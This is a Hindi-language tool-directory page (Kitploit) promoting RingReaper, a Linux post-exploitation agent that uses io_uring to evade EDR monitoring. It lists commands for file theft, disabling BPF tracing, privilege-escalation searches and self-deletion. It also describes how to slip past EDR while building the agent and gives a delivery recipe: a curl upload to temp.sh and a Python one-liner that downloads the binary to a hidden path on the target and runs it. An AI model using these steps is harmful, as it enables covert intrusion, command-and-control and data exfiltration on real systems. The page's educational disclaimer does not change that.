Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RingReaper — Linux पोस्ट-एक्सप्लॉइटेशन एजेंट जो पारंपरिक syscalls से बचकर EDR डिटेक्शन को चुपके से बायपास करने के लिए io_uring का उपयोग करता है। | Kitploit
उपकरण/GitHubGitHub/matheuzsecurity/ringreaper
विशेषाधिकार वृद्धिआईडीएस/आईपीएस से बचनाडेटा निष्कासनपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलप्रतिकूल हमला
GitHubmatheuzsecurity/ringreaper

RingReaper

Linux पोस्ट-एक्सप्लॉइटेशन एजेंट जो पारंपरिक syscalls से बचकर EDR डिटेक्शन को चुपके से बायपास करने के लिए io_uring का उपयोग करता है।

रिपॉजिटरी देखें
3836211 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RingReaper

RingReaper लिनक्स के लिए एक सरल पोस्ट-एक्सप्लॉइटेशन एजेंट है, जो उन लोगों के लिए डिज़ाइन किया गया है जिन्हें गुप्त रूप से कार्य करने की आवश्यकता होती है, ताकि EDR समाधानों द्वारा पहचाने जाने की संभावना को न्यूनतम किया जा सके। इस प्रोजेक्ट के पीछे का विचार लिनक्स कर्नेल में नया एसिंक्रोनस I/O इंटरफ़ेस io_uring का लाभ उठाना था, विशेष रूप से उन पारंपरिक सिस्टम कॉल्स से बचने के लिए जिन्हें अधिकांश EDR मॉनिटर या हुक करते हैं।

व्यवहार में, RingReaper read, write, recv, send, connect आदि कॉल्स को एसिंक्रोनस I/O ऑपरेशन्स (io_uring_prep_*) से बदल देता है, जिससे हुक्स और इवेंट ट्रेसिंग के संपर्क में कमी आती है, जिन्हें आमतौर पर सुरक्षा उत्पादों द्वारा मानकीकृत तरीके से एकत्र किया जाता है।

नोट: RingReaper के कुछ फ़ंक्शन अभी भी पारंपरिक कॉल्स पर निर्भर करते हैं, जैसे डायरेक्टरी रीडिंग (opendir, readdir) या सिम्बोलिक लिंक रिज़ॉल्यूशन (readlink), क्योंकि io_uring इन प्रकार के ऑपरेशनों को नेटिव रूप से अभी तक पूरी तरह समर्थित नहीं करता। फिर भी, मेरे परीक्षणों के दौरान, इन कॉल्स ने परीक्षण किए गए EDRs पर कोई अलर्ट ट्रिगर नहीं किया, ठीक इसलिए क्योंकि वे मॉनिटर किए गए नेटवर्क I/O पाथ के दायरे से बाहर आती हैं।

संक्षेप में, RingReaper को पारंपरिक कॉल्स से जितना संभव हो उतना बचने के लिए बनाया गया था, और यहां तक कि जहां उसे उनका उपयोग करना पड़ा, वहां भी इसने उत्कृष्ट एवेज़न क्षमताओं का प्रदर्शन किया, सामान्य सुरक्षा एजेंटों से कोई अलर्ट या डिटेक्शन नहीं हुआ।

पूरा और विस्तृत लेख यहां देखें:

https://matheuzsecurity.github.io/hacking/evading-linux-edrs-with-io-uring/

लेखक: https://www.linkedin.com/in/mathsalves/

रूटकिट रिसर्चर्स

  • https://discord.gg/66N5ZQppU7

कमांड संदर्भ

RingReaper में, नियंत्रण कमांड, अपलोड और डाउनलोड सहित सभी डेटा ट्रैफिक को io_uring से गुजरना होगा। यह यह भी सुनिश्चित करता है कि सबसे संवेदनशील ऑपरेशन पारंपरिक कॉल्स पर आधारित हुक्स और EDR मॉनिटरिंग की रडार से बाहर रहें।

एवेज़न के बारे में

RingReaper को शुरू से ही EDR मॉनिटरिंग को बायपास करने के लिए डिज़ाइन किया गया था। कई सुरक्षा समाधान अपने डिटेक्शन ट्रिगर्स को कर्नेल स्तर पर क्लासिक syscalls (read, recv, send, connect) को इंटरसेप्ट करने पर आधारित करते हैं। चूंकि io_uring अपेक्षाकृत नया है और इन उत्पादों की टेलीमेट्री पाइपलाइन में कम एकीकृत है, यह अक्सर अधिकांश एजेंटों द्वारा ध्यान नहीं दिया जाता है, जिससे अलर्ट ट्रिगर किए बिना C2 सत्र और डेटा एक्सफिलट्रेशन संभव हो पाता है।

यहां तक कि पुराने syscalls पर निर्भर रहने वाले फ़ंक्शन (जैसे डायरेक्टरी रीडिंग) भी अलार्म न बजाने के लिए पर्याप्त रूप से गुप्त बने रहे।

आवश्यकताएँ

  • लिनक्स कर्नेल 5.1 या उससे उच्चतर
  • liburing लाइब्रेरी
  • एक संगत C कंपाइलर (GCC के साथ परीक्षण किया गया)

पर्यावरण

निम्नलिखित कर्नेल संस्करणों पर केवल परीक्षण किया गया;

  • 6.8.0-60-generic
  • 6.12.25-amd64

संकलन

root@kitploit:~
sudo apt install liburing-dev -y
gcc agent.c -o agent -luring -O2 -s -static

निष्पादन

परीक्षण के दौरान, मैंने देखा कि EDR ने GCC उपयोग की रीयल-टाइम निगरानी करके agent.c के संकलन का पता लगा लिया (बेहतर है कि wget/curl का उपयोग न किया जाए)। इसे बायपास करने के लिए, मैंने एजेंट को अपनी मशीन पर स्टैटिक रूप से संकलित किया, तैयार बाइनरी को temp.sh के माध्यम से भेजा, और लक्ष्य मशीन पर इसे डाउनलोड और निष्पादित करने के लिए Python का उपयोग किया। यह तकनीक बिना किसी चेतावनी के काम कर गई।

सर्वर (अटैक बॉक्स) :

  • curl -F "file=@agent" https://temp.sh/upload
  • python3 server.py --ip IP --port 443

एजेंट (लक्ष्य मशीन) :

  • python3 -c "import urllib.request,os,subprocess; u=urllib.request.Request('http://temp.sh/xxxx/stealth_agent',method='POST'); d='/var/tmp/.X11'; open(d,'wb').write(urllib.request.urlopen(u).read()); os.chmod(d,0o755); subprocess.Popen([d]);"

अपग्रेड

संस्करण 2.0:

  • मल्टीपल थ्रेडेड कनेक्शन के लिए समर्थन।
  • कमांड हिस्ट्री ("up" और "down" कुंजियों का उपयोग करके)।
  • स्क्रीन को अव्यवस्थित होने से बचाने के लिए "Clear" कमांड।

योगदान

बेझिझक पुल रिक्वेस्ट बनाएं और प्रोजेक्ट में योगदान दें। RingReaper में कोई भी त्रुटि होने पर, कृपया एक issue बनाएं और हमें रिपोर्ट करें।

अस्वीकरण

यह कोड विशेष रूप से शैक्षिक उद्देश्यों, अनुसंधान और एवेज़न तकनीकों के नियंत्रित प्रदर्शनों के लिए विकसित किया गया था। अधिकृत वातावरण के बाहर कोई भी उपयोग, या दुर्भावनापूर्ण उद्देश्यों के लिए, सख्त वर्जित है और पूरी तरह से उपयोगकर्ता की जिम्मेदारी है। अनधिकृत या अवैध उपयोग स्थानीय, राष्ट्रीय या अंतर्राष्ट्रीय कानूनों का उल्लंघन कर सकता है।

टूल डाउनलोड करें
कमांडविवरणबैकएंड
getलक्ष्य से फ़ाइलें देखें100% io_uring
putफ़ाइलें अपलोड करें (एजेंट साइड पर recv का उपयोग करता है)100% io_uring
killbpfट्रेसिंग अक्षम करें, /sys/fs/bpf फ़ाइलें हटाएं और bpf-map का उपयोग करने वाली प्रक्रियाओं को समाप्त करेंपारंपरिक कॉल्स + io_uring
usersutmp पढ़कर लॉग-इन उपयोगकर्ताओं की सूची बनाएं100% io_uring
ss / netstat/proc/net/tcp से TCP कनेक्शन सूचीबद्ध करें100% io_uring
privescstatx का उपयोग करके SUID बाइनरी खोजें100% io_uring
psप्रक्रियाओं की सूची बनाएं (opendir, readdir का उपयोग करता है)पारंपरिक कॉल्स + io_uring
kickpts सत्र समाप्त करें (opendir, readdir, kill, readlink का उपयोग करता है)पारंपरिक कॉल्स + io_uring
mePID/TTY दिखाएं (getpid, ttyname)पारंपरिक कॉल्स + io_uring
selfdestructवर्तमान बाइनरी हटाएं (readlink का उपयोग करता है)पारंपरिक कॉल्स + io_uring
exitकनेक्शन समाप्त करें और बाहर निकलें100% io_uring
helpसहायता प्रदर्शित करें100% io_uring